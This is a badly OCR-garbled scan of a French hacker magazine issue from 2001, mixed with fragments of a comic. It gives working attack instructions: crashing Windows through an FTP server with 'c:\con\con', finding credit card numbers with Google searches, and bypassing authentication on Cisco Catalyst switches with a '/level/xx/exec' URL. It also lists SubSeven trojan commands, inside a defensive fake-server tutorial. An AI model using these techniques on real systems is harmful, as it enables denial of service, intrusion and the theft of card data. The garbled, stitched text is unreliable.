(0000027 24/1070 16:00:24 - stnfouz (192 168 0.115 214 End où statu 

(0000021 28/10/01 16:00:34 : stifouz (192 168.0.1] x SIZE c'\wndowsitehet exe 

(0000021 29/10/01 16 00:34 : stitouz (192 168 0 1} > 213 109544 


9 Setup User Accounts ù TK 






















Setup pe Setup | :  p UserAccounts 
%, Miscellaneous | 
Li Links & Messages | Access Rights 
GA Ratio, Quots, Bps Files 

IP & Barmed Files ÉD CA gen RP M Resd 
1 Notes FT Wiite 
É Status f” Delete 

: FT Append 

 Directories 

: M Make 

LP: List 

: [ Delete 

: FT 4Subdis 
ESLTT TPS | Fa M Al/None 


Setup | 
| F Login TR ne 
. N Password TRANS EEE ESS 


CETTE SOURCE PRODUIT 
L'ETRANG-E,UNE ÉNERGIE 
QU' RAYONNAÎT PARTOUT Ci 





Si LES FO,N. NOUS AVAÏENT LAÏSSÉS 

ENTRER EN CONTACT AVEC ŒTTE SouRCE, 

CRT an 
ou (e) L DE 

D LU 0 Ce OS 
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[C\ Invite de commandes - telnet 192 168.02 21 


220 G6 FTP Server ready ... 
USER strifouz 
331 Passuord required for strifouz. 
sS da 
«+ strifouz logged in. 
cud 
260 CUD command successful. ‘/C:/Agent"” is current directory. 
stat 
211- G6 FTP Server status for strifouz onm 
211- «192.168.0.1:3165 <-> 192.168.0.2:21) 
FA (1 
211- Uploaded : 4 Kbuytes 
211- Dounloaded : H Khuytes 


of status. 
ie c:\Nwindous\te inet .exe 


544 





Etape 3 : attaque 


Une fois que l'on a confirmé la possibilité d'accéder à des fichiers hors limites, 11 est possible de planter le système cible. Il n'y a pas 
moyen de faire ouvrir au système cible un fichier, en revanche il est possible de le faire planter via une tentative d'accès au "répertoire" 
c:\con\con (ou \nul), arborescence ayant la fâcheuse tendance d'entraîner un plantage du noyau de Windows (il ne s'agit pas vraiment 
de répertoires), concluant Sur un crash immédiat du système sur les versions Windows non corrigées. Sur d'autres OS, il doit aussi être 
possible d'amener la déstabilisation d'un système par ce type de commandes. 


SIZE.e:\con\con 

Sinon$achez qu'avoir la taille d'un fichier est loin d'être une chose inutile. 

Cela pérmettrait, par exemple, de deviner la longueur de clés en matière de cryptographie, mais là on rentre dans un tout 
autre domaine. 


Da Strifouz 







MAI S.ILS ONr DÉCIDÉ DUT ILISERS— 
 L'ETRANGE À DES FINS PERSONNELLES, 
LS ONT TRoMPÉ LES HABITANTS DE & 
CÆ MONDE EN LEUR. CHANT LEURS 

A \VÉRITABLES PROJETS, EL 








Le 
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Annuler l'enregistrement 
des mots le JaSse SOUS vindaube 


Dans les boîtes de dialogues des acces aux réseaux à distance, Wind vous permet de cocher une case afin de mémoriser votr e mot t dé 
passe "Enregistrer le mot de passe". 





Ce mot de passe peut être vu très facilement. 
(C\Windows\*.pw) avec un simple décodeur (PwToo!) 
Pour empêcher l'enregistrement du mot de passe, il vous suffit de vous rendre dans le registre à cette clé : 


HKEY_LOCAL_ MACHINE Software \Microsof{\Windows\ZurrentVersion\Policies\Network 


* Ajoutez une valeur binaire nommée "DisablePwdCaching"' et affectez lui la valeur 10 dans le menu "Modifier’! avec le click droit. 


Astuce : Modifiez le click droit. 


Une astuce pour Windows 98 afin d'accélérer l'exploration en un simple click droit : 

Si vous voulezvoir apparaître un menu lors d'un click droit sur vos dossiers, afin de lancer l'explorateur oun'importe quelautre programme, 
il vous suffit d'ouvrir "Options des dossiers." en allant dans "Démarrer / Paramètres". Sous l' QUERE "Types de fichiers" repérer l'élé- 
ment "Dossier", double cliquer dessus et activer le bouton "Nouveau". | | 


Dans la zone "Action", mettez "Hzv!' et ‘explorer.exe /e, /root, %1!" dans la zone "Application utilisée pour exécuter cette action"! 
Vous pouvez fermer en validant les fenêtres. 
Vous pouvez maintenant faire un click droit sous un dossier et remarquer le menu "Hzy" qui permet de lancer l'explorateur. 


Cette valeur est aussi accessible dans le registre sous la clé : 


HKEY_CLASSES ROOT\Directory\shel!\Hzy 
Recherchez un numéro de carte bleue 


KO 





Résultat du concours MacHack (suite) : 


Parmi les boutons-radios, un seul est suivi d&#8217;un menu déroulant. Dans ce menu déroulant choisir 
I&#8217;article Personnaliser, ce qui ouvre une zone de dialogue avec tout un tas 

de case à cocher. À droite se trouve les options avancées parmi lesquelles 1l y a une case à cocher pour effectuer la 
recherche parmi les éléments invisibles. 


Avec Mac Os 8 et 7 | 

Depuis le finder choisir le menu Fichier/ Rechercher, qui lance I&#8217:outil de recherche intégré au système ( comme 
pour Mac Os 9). Pour avoir accès au critère éléments invisible, il suffit d&#8217;appuyer sur la touche ALT avant de cli- 
quer sur le menu déroulant des choix de critères de recherche. | 

Thunderangel 


NB : Attention : Resedit est 1 éditeur de resources il peut modifier les attributs 
d&#8217;un fichier mais on ne peut pas faire des recherches avec . 


Sander Krauss (chef de la rubrique Machack) 
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avec Google 


Vous le savez, lemeilleur moteur de recherche est bien sur 
google. 


Créé par deux étudiants deéStanford : Sergey Brin et Larry 
Page, il est devenu le plus populaire en moins de 3 ans. 

Comme tout moteur de recherche, google utilise un robot, appe- 
lé fourmi ou araignée. 


Son principe est simple : 


. Un robot fonctionne avec les 3 programmes suivants : 

- Un programme permettant de parcourir les sites inscrits. 

- Une,basede donnée permettant de sauvegarder les données 
récoltées. (Balises metaname, les textes, fichiers .pdf, .zip …) 

- Un moteur de recherche permettant àd'utilisateur de recher- 
cher dans la base de donnée, 


Depuis le 31 octobre, googlepermet d'indexer les fichiers Word, 
Excel, et PowerPoint: | 

Celan'a rien d'extraordinairemaisenallant danslémenu "recherche 
avancée" il vous est possible de rechercher un mot exact ou une 
expression qui pourraient être contenus dans un fichier .doc / 
.XIS 


Imaginez une secrétaire mettant toutes les coordonnées d'un 
elient(carte bleue, adresse, tel.æ) Sous ses formats préférés (.doc, 
xls), qu'elle placesur un serveur accessible par le net. 


Il vous suffira d'être créatif danse choix de vos mots, et google 
vous sortira une liste qui vous fera rêver ;) 


LES INGÉNIEURS AVAIENT FABRIQUE 
EN SECRET UNE MEMBRANE DESTINÉE À 
CANALISER L'ETRANGE Qui ÉMANE TE 





LA S'RVU.C ,1LS LUTILISENT COMME 
CARBURANT D'UNE MACHINE MERS 
M@ES,, 


TERRITOIRE TES 


Allez, je vous mets sur la voix : 


Code client 
Carte bleue 
Coordonnée 
EI … 


Cettepetiteerreur qui pourrait tourner au cauchemar pour certains 
webmaster, n'est simplement due qu'à l'absence d'un fichier quiinter- 
dit le référencement. 


Ce fichier s'appelle robot.txt, il se situe à la racine du site. 
Pour le consulter, il vous suffit de taper : 


htt://wv site.com/rohot dt 
Le fichier robot.txt est constitué de 2 lignes : 


User-agent: * <mmmn Permet à tout robot d'indexer 
Disallow: /password 


Pour voir’ ce que le webmaster cache dans le répertoire, 1l vous 
suffira de taper : 


htm site.com/rassword/ 


Par contre, il faut savoir qu'après référence ment du site, la base 
de données ne sera accessible que sous 30 jours. 


DECEMBRE 2001 


Trouver les nombres de CB 


VS Interdit l'accès à tout robot : 


nes —— —- ——ç———— 


—e ne ne gee 


2 
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CISCO 105 


Qui a dit que les routeurs Ciscos étaient invulnérables ?? 


le PRÉSENTATION 


Un réseau local d'entreprise, LAN, est composé d'éléments 
actifs, comme les switch. Contrairement beaucoup de hub, les swti- 
ch sont administrables. Ils. possèdent alors un petit système pro- 
priétaire, accessible via telnet ou un navigateur web pour 
certain. 

Les swtich catalyst de CISCO sont fort présents dans les grandes 
structures (fabriquant derouteur, firewall.….), ilspermettentalors 
une gestion et uné administration plus intelligente des intercon- 
nexions dans un LAN, 

Avec l'adresse IP du switch et bien sur les informations adminis- 
trateur, il est possible de les configurer comme bon voussemble : res- 
triction de ports, redirection.… 





Sur le terrain : 
Etant intervenu sur un site, qu une société, je fis un tour rapi- 
de, près des armoires de brassage, où sont présents bon nombres 


DIT IC INTATIS TIRE T1 1214 


GET RIPETT 


de switch catalyst. Comme beaucoup le savent, les pénétrations 
internes ne sont pas rares, 80% des intrusions proviennent d’une 
personne interne à la société, ou avec l'aide d’un employé. 


Après un rapide traceroute et un petit scan local, j'obtiens 
l'adresse IP des switch ; n'ayant pas les mots de passes adminis- 
trateur de l’IOS Cisco, je ne peux pas entrer dans les switch en 
question. .….ceci est valable pour la fonction telnet. .par contre 
je préfère nettement une interface web, car c’est plus conviviale. 


fl + PÉNÉTRATION 





Une faille de sécurité est présente sur ces switch, il est facile de 
lancer des commandes, en bypassant l’authentification. Ces com- 
mandes sont lancés avec 1 e niveau 15 de sécurité des switch Cisco 
(le plus haut). | 


Je procède donc au test : 


. Normalement 1] y a une fenêtre d’authentification qui s'ouvre, 


mais la non... 





tube Eds  Affhige Pavot Oé 


| débrdsdinte ” ‘93 à! Dracrurter Layer “miss. gi 2 PTE “0%. 


hesalfiilenee) | 


EN2924/4900 


| Hdrmte LT 
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ÉFÉALE À LéMPITALY Attesae list entry 
Access Lernp jace 
CARE À Comporary Atcess-List ent£7 " 
peohivE 
mañagé arghive files 
Ci 
Change eu££ent directory 
tient 
Fasat functions 
giocx 
Kanage the 2y2tam #16ek 
cluster k 
diisrér 84a0 Made commande 
nfigure 
Entér contigquration mode 
Cap 
Copy from one fils to andéher 
dabu 
Dakuudina functions (888 also 'urdléhug') 
de Le ce 
pPalate a fiie 


(l 


< 


& 


17 


List files on a tiles/écem 
rase 


ni 


4 


ê 


rase & tilesyatem k . 


{arroser 
foros à Lilr#ya6am 
L£cr 
FESK à filesystam 
hw-modu ls 
Cérarainds 60 manipuiaré à Laruer médule 





{2} 


S 
Le 4 
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3 


Display the contents 61 « file 
10 


Disabie dehuyyine functions 


Hana acho Messages 


3 Es 
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M 


Display éurrant VerhiNny AiCACESEY 
sad 

Hait and perform à Gold Festart 
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Ici on peut faire un ‘ping’ par exemple (je n'entre pas dans le 
détails de toutes les commandes, ce serait trop long) 





on entre alors sur le switch voulu en utilisant l’exploit : 


httn://adresse du switch/level/xx/exec 


ici ‘xx est un entier compris entre 16 et 99 ts TT CONCLUSION É 
On peut alors exécuter les commandes citées sur la page Beaucoup de ces switchs Catalyst sont vulnérables, ceux ayant 


une version d’IOS software 1 1:3°et plus, 1l faut donc télécharger 
la nouvelle version sur le site de Cisco (http://www.cisco.com/) et 





ping Minresofl Internet Explorer 





» | level. 19) exe 








| Fichier … Edition Affichage Favors Out 2 upgrader l'IOS vulnérable: + 


| SaBrécédente » = - © 2] 2! rechercher (SFavors RAS Ne en 

Fans 9 3 3 ar © Ilfautveäilleràce que ces switch ne soient pa$ visible via le fire- 
wall, car il existe des failles permettant de bypasser ces derniers 
et avoir donc accès au LAN. 


, Rs Hakim ue l'équipe SecureNT 2000 





| Adresse HQE] hnp:/; Mari erec pre 


EN2924/4900 


À 
IP echo 
tag 
Tag encapsulated IP écho 
_WORD | 


Ping destination address OC hostneme 






CETTE MEMBRANE PRODUIT UNE RÉALIT 
CANCÉREUSE, CE CANCER DE LA RÉALITÉ 
PREVOQUE UN APPAUVRISSEMENT GRANDI 

DE L'ÉNERGIE QUI SE TRADUIT CHEZ nous MA 
LA NUMÉRISAT ion DE LA MoINDRE PARTIQUL 
ET ENGENDRE Ci DES MONTAGNES iNSATIABLES 
PRODUITES PAR DES USINES 

EN FOoLiE 
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LEE MERVEÏLLEUX N'ÉTAITQUE LE DÉBUT DUNE 
1 DEPERDITION DE LA RÉALITÉ, LE CYBER 
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JUSQU'À DEVEN IR UNE MASSE INDIFFÉRENGIEE 
GLISSANT VERS UN ANÉANTISSEMENT FULGURANT 








ON VEUT VENIR À BouT DE 
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Déjà collector 


AE «Pourquoi sommes-nous devenus Hackers » page 8 M 


RHACRERL VOICE > 


La v2ix dû nirare imfctMmañale EG 


EXCLUSIF: 


FOZZY revele une faille Æ 
Monstrueuse dans club-internet, Æ 
lemontie.fr, canali.net, hariscone.fr... 


© Elle permet de 
pirater les mails de 1,9 
million d'utilisateurs 

© NOKIA mode d'emploi :) Ë 
Oran sa Loi sur irc De 
PHP holes for Elit © 





_ Chez voire marchand 


de journaux 
_ le «<grand> HZV 
[ss] 
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oin Zi HackAdemY 


mé 7 La hack school d’Hackerz Voice 
ME les inscriptions sont ouvertes pour les nouvelles sessions 2002 






WWW. dmpfrance .com CR 
Comment s'inscrire ? | Nouveau: nos cours thématiques 
Par téléphone en appelant le Fin décembre /début janvier, 
01 40 21 01 20 du mercredi au samedi inclu, de r | 
11H 19H. | | | debut iles cours Linux 


| Trois niveaux sont proposés 
Sur place du mercredi au samediinclu, de Utilisateur débutant, 


11H 20H. Notre adrèsses Utilisateur avancé, 
1 Villa du clos de Mallevart : Administration système avancée. 
(anciennement. 7 rue Darboy) 75011 Paris. A partir de janvier 200? 


M° DL ou Parmentier 


cours d'architecture réseau 
sécurisée (à base de firewalls, 


DMZ, anti-virus.) et 
Vous serez abrite en Hénctior des places 
disponibles dans la classe de votre choix. programmation en C 


Par courrier postal ou par mail: 
Hremonaee com 


En cas d'impossibilité nous vous .. Une série de cours pour débutants, suivie d'un 
proposerons un autre choix. _ cours de programmation système. 

Pour connaître les-disponibili- : So | 

tés: #7" _ Début ce mois-ci des cours Wild 
unseul contact: ; par Fozy et Viktor et du cours 
Billy Dub au (0)1 40 21 01 20 intrusion (su | Le | 
20h ou par mail. ; RIPUSION (sur acceptation après entretien) 
Billydub@dmpfrance.com Les tarifs 


Insistez!!! 
Les cours par correspondance 


Les cours par correspondance sont directementtir s 
des cours dispens s Zi hack. Le programme des 
cours par ou estdoncle m me que celui 
dispens dans les locaux. 


Les tarifs sont ausi identiques, une diff rence pres: par 
correspondance, le cours New bi + 

est compris dans le cycle New bi, pour le 
même tanf. Pourtouteinfoconcemantces cours, ou pour SO ES 
vous inscrire, contactez directement | cole au 01 40 1 01 Cours thématiques: (6 heures en 4X2h) 
20; du mercredi au samedi inclus, de 11h 20Hou 


consultez Www.dmpfrance.com 
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Les principes fondateurs de Zi Hackatdemy 


Nous, fondateurs et collaborateurs de Zi Hackademy, déclarons ce jour : 


Zi Hackademy est un lieu ouvert à tous, sans aucune distinction, qui a 
pour but la diffusion auprès du public d'informations permettant 
la compréhension du fonctionnement des réseaux informatiques. 


Nous agissons pour accroître la transparence dans l'information du 
public utilisateur de ces technologies, et de tous les citoyens. 


La diffusion la plus large possible des informations d'experts liées au 
fonctionnement des réseaux HOHMAIqUe est pour nous une démarche 
c'ovennes 


Nous condamnons toute forme de piratage ou de tentative de piratage, 
comme nous condamnons naturellement toute démarche 
en contradiction avec les lois de la République. 


C'est dans cet esprit que nous voulons connaître et faire connaître, V 
compris jusque dans le détail et la complexité, le mode de fonctionne- 
ment des piratages. 


Nous affirmons que notre action d'information du public et des citoyens 
a finalement pour but essentiel et principal la sensibilisation aux 
aspects éthiques et légaux induits par le développement de ces 
nouvelles technologies. 


En diffusant largement l'information, nous voulons contribuer à donner 
aux citoyens les moyens de critiquer eux-même, lorsque nécessaire, le 
fonctionnement des réseaux dont ils sont clients ou utilisateurs, dans le 
cadre de leur vie privée ou de leur entreprise. 


Les valeurs qui inspirent notre action sont, placées sur le même plan, la 
liberté et la responsabilité individuelles, qui sont aussi notre idéal. 


Nous pratiquons également l'entraide entre nous et soutenons toute 


action, toute publication et toute initiative poursuivant les mêmes buts, 
en France et dans le Monde. 
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Tout d'abord, pour les newies, je vais eXpIIQUer C8 QU'eSt Un trojan. 
Un trojan est un programme qu'on vous envoie et qui une fois exécuté ol 
votre machine fonctionne comme le célèbre cheval de Troie, il va permettre à 
des attaquants d'entrer librement dans votre machine et de la contrôler de 
fond en comble. Votre machine a donc les portes grandes ouvertes sur le monde... 


Avec la multitude de trojans qui existent et qui sont mis on-line 
tous les jourset la croissance dunombre d’apprentispiratessur Inter- 
net, 1l devient nécessaire pour un particulier de s’en protéger 
correctement afin d'éviter une attaque de ce type. 


Nous allons voir dans cette article, comment RIOEE ammer un 
logiciel de défense contre les trojans. 


C’est à ro un faux trojan et non un logiciel d’éradication de 


trojans. Il ya deux utilisations possibles pour ce type de programmes : 


- Pour simuler une machine vulnérable, afin de voir si quelqu'un 
scanne et essaie d'exploiter la faiblesse simulée (c’est en fait un 
pot de miel ou honneypot, voir HZ V07) 


- Après détection et éradication d'un trojan sur la machine, pour 
le remplacer par un faux, pouvoir comprendre les intentions de 
la personne qui l'utilise, et la prendre en flagrant délit, sans 
qu'elle ne se rende compte que l’on a détecté son attaque. 


1) Informations sur le trojan et interprétations 
11) Codage en VB 6.0 d’un anti-trojans 
111) Exemple de subseven 2.1 GOLD 


1) INFORMATIONS SUR LE TROJAN ET INTER: 
PRÉTATIONS : 


Tous d’abordle meilleur moyen d’avoir desinformationssurun tro- 
jan est de se le procurer. 


Télécharger la partie client destinée à l’attaquant et la partie 
serveur destinée à la victime. Infecter votre propre machine en 
mettant un mot de passe sur le serveur si le trojan le permet. 


Une fois que ceci est fait, on peut commencer à récolter des infor- 
mations sur le trojan. 


Déjà 11 faut effectuer un scan de port sur la machine afin de 
savoir quels portsutilisele trojan. Pour fairelescan de port, onpeut 
utiliser de nombreux outils qui existent sur Internet comme 
Fastscan, AnalyseR, NMAP etc... (ces programmes sont dispo- 
nibles sur www.securent-2000.com ). 


Lorsduscanilfauts’assurer qu'iln’yaitpasunserveur FTPouautre 
lancé intentionnellement, cela pourrait faire confusion. 


Une fois que le port où écoute le serveur du trojan a été trouvé, il 
va falloir connaître les variables de commandes qu'utilise le 
client. 


Il faut avoir un minimum de connaissance en VB. 


Le système client/serveur est un système simple. Le client envoie 
une chaîne de caractères au serveur qui l’interprétera et exécute- 
ra la demande. 


Ce n'est pas le client qui exécute la commande sur le serveur, mais 
il demande au serveur de l’exécuter (c’est le serveur qui fait la 
tâche) ce qui est différent. 


Par exemple, nous créons un nouveau projet, une nouvelle feuille 
(Forml), un bouton (cmd) et un contrôle Winsock (Ws) : 


Partie client : 


Private Sub em ClickO 
Ws.Close ‘on ferme le socket afin d'éviter une 
erreur dans le cas ou il serai déjà 
Ouvert. 
‘on choisi l'IP du serveur 


‘on choisit le port ou écoute le serveur et 


Ws.RemoteHost = 193.252.114.6 
Ws.RemotePort = 3000 


sur le quel on va se connecter 
Ws.Connect ‘on se connecte 
Ws.SendData ("os") ‘on envoie la chaîne de caractère “os” 
sur le port ou est connecté le client, 
c'est le serveur qui reçoit la chaîne. 
End Su 


Partie serveur : 


Private Sub Form Load) 
Me.Hie 
On Error Resume Next 
Ws.Close 
Ws.LocalPort = 3000 
Ws.Listen . 

Ent sub 


‘on met le port 3000 sur écoute 


Private Sub ws_ ConnectionRequest(ByVal requestiD As Long) 
On Error Resume Next 
Ws.Close 
Ws.Accept requestiD 

End Sub 


‘on accepte les demandes de connexions 


Private Sub ws_ DataArrival(ByVal hytesTotal As Long) 
On Error Resume Next 
Dim dat As String 
WS.GetData dat ‘toutes les données qui arrives sont 

placées dans la variable dat 

“condition sur la variable 


“ execution de notepad de windows. 


Ifdat = "os" then 
Shell("c:\windows\notepad.exe") 
End if 
Ent sub 


[s] 
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. Cepetitexempledeclient serveur permet de mieux comprendre com- 


ment fonctionnent les trojans. Eneffet on peut créer de faux serveurs 


très élaboréssi on connaît leschaînes decaractères qu'envoieleclient 


et ses correspondances sur le serveur. 
Pour connaître toutes ces chaînes de caractères et les correspon- 


dances, le principe est simple : il suffit de créer un petit program- 


me qui écoute sur le même port que le serveur et qui logue to toutes 
les données arrivantes dans une textbox 


On ferme donc le vrai serveur du trojan, on ouvre notre petit 
programme et leclient du trojan. Oncliquesur un bouton par exemple 
"open CDROM" et on verra apparaître dans notre programme 
la chaîne qu’a‘envoyé le client par exemple "OPCD"'. Ainsi nous 
savons que OPCD sert à ouvrir le cd-rom. On applique cette 
méthode pour chaque commande que propose le client et on note 
toutes les réponses soigneusement. 


Une fois toutes ces informations notées et sauvegardées, on va pouvoir 
passer à la programmation d’un programme de défense contre les trojans. 


ll) CODAGE EN VB 6.0 D'UN ANTI-TROJANS : 


Pour contrer un trojan et éviter desefaire avoir il faut l’émuler. C’est 
le principe de beaucoup d’anti-trojans tel que NoBO. 


Eneffetsionsesert du même port quele vraiserveur du trojan, alors 
il y aura uneerreur et toutes les attaques provenant de l’exté- 
rieur pourront être loguées par notre petit programme. 


Nous allons donc justecréer un petit serveur quimet sur écoute 
le même port quecelui du serveur du-trojan et loguer toutes les 
demandes de connexions qui sont en réalité des attaques. 


D'abord On met sur écoute le port désiré (vu dans le I) 


Private Sub Ws_ ConnectionRequest(ByVal requestiD As Long) 
Ws.Glose 
Ws.Accent reguestiD 
Ws.SendData (ok ”) 
MsgBox “Trojans = Nom dt trojans" & vhGrLf & “attaquant : ” & Ws.Remote- 
HostiP & vhGrLt & "source port =" &WS. RemolePort, , “ATTAQUE !” 
El sub 


Ici une Msgbox s s'ouvre à chaque fois que quelqu'un fait une demande de 
connexion sur le port mis sur écoute. Son IP port etc…. sont affichés. 


Ce simple bout de code suffit à se protéger contre la plupart des 
trojans | 

Mais allons un peu plus loin. En effet, nous avons obtenu plu= 
sieursinformationssur lés chaînes decaractères qu’envoyait leclient 
pour exécuter unecommande ainsi on peutmettreune conditionsur 
les données qui arrivent afin d’également les interpréter comme 
le vrai serveur. Sauf qu'ici nous n’allons pas exécuter ce que veut 
le client mais uniquement traduire et informer l’utilisateur du 
programme de défense. 


Private Sub Ws. DataArrival(ByVal bytes Total AS Long) 
Dim recu As String 
Ws.GetDala recu, vhString 
Ifrecu = "OPCD" Then 
Msghox “l'attaquant tante d'ouvrir votre lecteur cd-rom” 
End |! 
End Sub 


a 
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Voilà ainsi la victime sera protégée contre une contamination du : 
trojan, contretoutesattaquesextérieuresetconnaîtralesintentions:” 
de son agresseur | 

Ne vivons nous pas une époque formidable ? 


Passons maintenant à un exemple concret : le célèbre Subseven 
que j'ai eu le plaisir de décortiquer… 


ill) EXEMPLE DE SUBSEVEN 2.1 GOLD : 


a - Etude du trojan ï 


‘Pour comprendre cette étude, il est nécessaire que vous ayez le 


client de SubSeven. Afin de comprendre les commandes lan- 
COS 


Port par défaut du trojan : 27374 
Port par défaut de la Matrix : 7215 

Port par défaut du Keylogger : 2773 

Port par défaut de " spy" : 54283 


Commande “desktop preview" : | 
Cettecommandesert à visualiser l'écran de la victime. Lorsquecette 
commande est lancée, les données !'IN2"'sontenvoyéessur leserveur, 
sur le port 27374. Lorsqu'on arrête cette commande, les données 
"CL2" sont envoyées. | 


Commande "Webcam : | 

Cette commande sert à utiliser la Webcam du serveur sans son 
autorisation. Pour commencer la capture le client envoi ” IN7 à 
et pour la terminer : " CL7" | 


| Commande "msgMessanger : 


Cette commande sert à envoyer des nagscreen, ou plus simple- 
nrent des boîtes de messages windows. Avec la possibilité d’en- 
voyer n'importe quel message avec n'importe quel icône. 


Comment marche cettecommande”? Lorsque vousenvoyezcettecom- 
mande, les données envoyées commencent toujours par "MW" 
puissuivies d'unnombreà { chiffre qui correspond aux boutons pré- 
sent : 


D =0K 
1 = Ahort, Relry, Ignore 
2 = UK, Cancel 
à = Relry, Cancel 
* 4 = Yes, No, Cancel 


Cenombreestsuivid’unsecond nombre toujours à 1 chiffre quicor- 
respond àl’icône du message : 


0 = None 

1 = Warning 

2 = Information 

à = Error 

4 = Question , 


Ces 2 chiffres sont suivis du titre du message puis derrière le titre 
il ya "ZIXX" et à la fin de la chaîne de caractères se trouve le 
corps du message. | 
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Un envoi de message peut donc donner quelque chose comme 
ceci : 


MW:21AttentionZiXXvous êtes infecté ! 


Commande "keylogger" : 

Pour commencer la capture via le port 2773, le client va envoyer 
cette chaîne de caractères au client : TKSon2773 

Pour arrêter la capture, le client envoie : TKSoff 


Commande "disabladed keybord" : 
Le client envoie "DAK"' pour désactiver le clavier de la victime. 


Modifications du serveur : 


Changement de port :sert à modifier le port par défaut égal à 27374. 
les données envoyéessont : CPT+n° de port. Parexemple CPT1000 


Changement de password : sert à ajouter ou à modifier le mot de 
passe d’accès au serveur. Les données envoyées sont :NPD+pass- 
word. Par exemple NPDjohan. 


Removepassword : sert à supprimer le password du serveur lorsqu'il 
y en a un.Les données envoyées sont : NPD _PZD 
Fermer leserveur :sert à fermer leserveur. Les donnéesenvoyéessont : CLS 


Remove serveur : sert à enlever le serveur de la victime. Les don- 
nées envoyées sont RMS 


Commande “web browser" : 

sert à ouvrir une URL sur le poste de la victime. 

Le client fait une demande au serveur comme ceci : URL-+url. 
Par exemple : URLhttp://www.securent-2000.com 


Contrôle de la souris : 


Reverse bouton : sert à inverser les boutons de la souris apparte- 
nant au serveur. Les données envoyées par le client sont : RMB 


Restore bouton : sert à rétablir les boutons comme à l’origine. 
Les données envoyées sont : BMB 


Hide mouse : sert à cacher le curseur de la souris appartenant au 
serveur. 
Les données envoyées sont : SMCoff 


Show mouse : sert à montrer la souris lorsqu'elle a été cachée 
auparavant. 
Les données envoyées sont : SMCon 


Move/contrôle : sert à contrôler la trajectoire de la souris. Les 
données envoyées sont : MMStart . Pour arrêter cette commande 
le client envoie : MMStop 
Set mouse trail : la valeur du trail varie de 2 à 10. La commande 
envoyée par lechentest:SMT+trail. ParexempleSMT4. pour arrê- 
ter cette commande le client envoie : SMTofF. 


Commande “clear record password" : 
Sert à supprimer les mots de passe enregistrés en mémoire. Les 
données envoyées par le client sont : CPL 


Utilisation du chat : Le chat du client permet de chatter avec un 
autre client connecté sur le serveur et de chatter avec la victime. 
Différents paramètressont paramétrables comme la taille et les cou- 
leurs du texte du client et du serveur. 


Comment les informations sont transmises ? 

Le client envoie des données de cette manière : OVCO+taille du 
chat+taille texte victime-+taille texte client+06cl-+couleur vic- 
time+cl+couleur client 


Par exemple :0VCO25101 506cIGreycl Yellow 


Dans cet exemple la fenêtre du chat qui va s'ouvrir aura une 


taille égale à 25, la taille du texte de la victime sera égale à 10, la 


taille du texte du client sera égale à 15, la couleur du texte victi- 
me sera grise et celle du client sera Jaune. 


Voilà pour cette petite étude. Maintenant nous allons voir comment 
se servir de ces informations pour coder un programme de défense. 


b- Codage d'un anti-sub7 : 


Déjà commencer par créer un projet avecun contrôle Winsock (nommé 


ici Winsock1) et 2 boutons. 


Associer la mise sur écoute du port 27374 pour le premier bou- 
ton, comme ceci : 


Private Sub Commandi_ ClickO 
Winsock1.Close 
Winsock1.LocalPort = 27374 
Winsock1.Listen 

End Sub: 


Nous allons associer au deuxième bouton, l'arrêt de l'écoute : 


Private Sub Command2._ ClickO 
Winsock1.Close 
End Sub 


Maintenant il faut faireréagir leprogramme lorsqu'il yaune demande 
de connexion sur le port mis sur écoute. 


Donc nous allons ajouter ce morceau de code : 


Private Sub Winsocki_ ConnectionRequest(ByVal reguestiD As Long) 
Winsock1.Close 
Winsock1.Accept renuestin 
Winsock1.SendData ("connectet...)") 
MsgBox “Trojans = sub7" & VOCPLE & attamuant " & Winsock1.RemoteHos- 
UP & vhGrLi & “source port =" & Winsock1.RemotePort, , "ATTAQUE !" 
End Sub 


Voilà, 1c1 le programme va vous montrer une MsgBox avec des 
informations sur l'attaque lorsqu'un client va tenter de se 
connecter sur votre port. 

Winsock!.RemoteHostIP : sert à donner l'attaquant. 


Winsock1.RemotePort : sert à donner le port source de l'attaque. 


Winsock!.SendData ("connected 
ici 'connected.….:)" au client. 


:)"):sert à envoyer des données, 
4 
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Cette chaîne de caractères va s'afficher dans la barre d'état du If Text2. Text = "IN7" Then 


trojan. | BJ =" client tente d'utiliser votre webcam pour vous visualisez à votre 
| End 


É = SubSeven v.21 GOLD by mobman +» x 


ip#uin 217.128.20.137 *|nort:127374 disconnect 


IE Text2.Text = "CL7" Then 
Text3.Tent = “le client cesse de vouloir utiliser votre webcam" 


En 
F5 IE Text2.Text = "CPL" Then 
Text3.Text = "le client tente de supprimer vos mots de passe" 
En f | 


IE Text2. Text = “DAK” Then 
Text3.Text = “le client tente de désactiver votre clavier" 
En 


If Text2. Text = "CLS" Then 
Text9. Text = “le client tente de fermer le serveur" 





| En 
MEME CS OIUNTEONE 
| | IE Text2. Text = "RMS" Then | 
|-idle- connected...) | | UE = client tente de supprimer le serveur afin de vous désinfecter il 
Ainsi, le client croira qu’ilest connecté sur le serveur. Alors que En 1f 
ceciestunfaux serveur, Toutes léscommandes qu'il lancera neseront 
pas exécutées :) IE Text2.Text = "NPD_ PZD" Then 
| Text8. Text = “le client tente de supprimer le password du serveur" 
Maintenant passons à l'interprétation des commandes deman- Ent 1f 
® dées par le client (l’attaquant). Pour ceci créer 2 textBox. Une 
qui Servira à mettre la chaînede caractères telle.quelle et l’autre (Text? Text = "’TKSon?772" Then 
qui servira à mettrela traduction sur les intentions de l’atta- Tex. Text = “le client tente d'activer un keylogger qui utilise par defaut le port 
quant. 2173" | 
re Dray a  L ms | 
M PINQ | 1 [ 
Winsock1.GelData recu, vhString (EText2.Text = "THSON" Then | 
AU" = PCI Texta.Text = "le client tente de fermer le keylogger" 
| En 1 


Puisinterprétons les demandes”: Ent! Sul 


TI | Bon je n’ai pas tout mis car le code est un peu long. 


: 1 = "{e client tente de visualiser votre écran" - 
I 


Fait par Johan de l'équipe SecureNT-2000 


I Text2. Text = "CL?" Then | | | 
| no =" client a remer a fenêtre de capture d'écran" | www.secureNT2000.com 
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The VO | CP qu | 
Salut à toute l'équipe | 


Il y a maintenant 4 mois que je me suis abonné à votre journal et J'aurais souhaité avoir un peu plus de renseignements sur les cours par 
correspondance. 


Ceci dit, dans votre article “tout pour faire chier le monde" du numéro 6, j'ai repéré plusieurs erreurs pour les desinstall suivante : 
- L'imprimante | La 
- Le clavier 
- Le modem 
- L'écran 
- Le D Dur 
- La souris 


Pour chacun de ceux là vous aviez mis (par ordre de citation ci dessus) : 


"HKEY_ CURRENT _USER\System\CurrentControlSel\Services\£lass\Printer\" 
"HKEV_ CURRENT _USER\System\CurrentControlSel\Services\Class\Keyboart\" 
"HKEY_CURRENT_ USER \System\CurrentControlSel\Services\£lass\Moden\" 
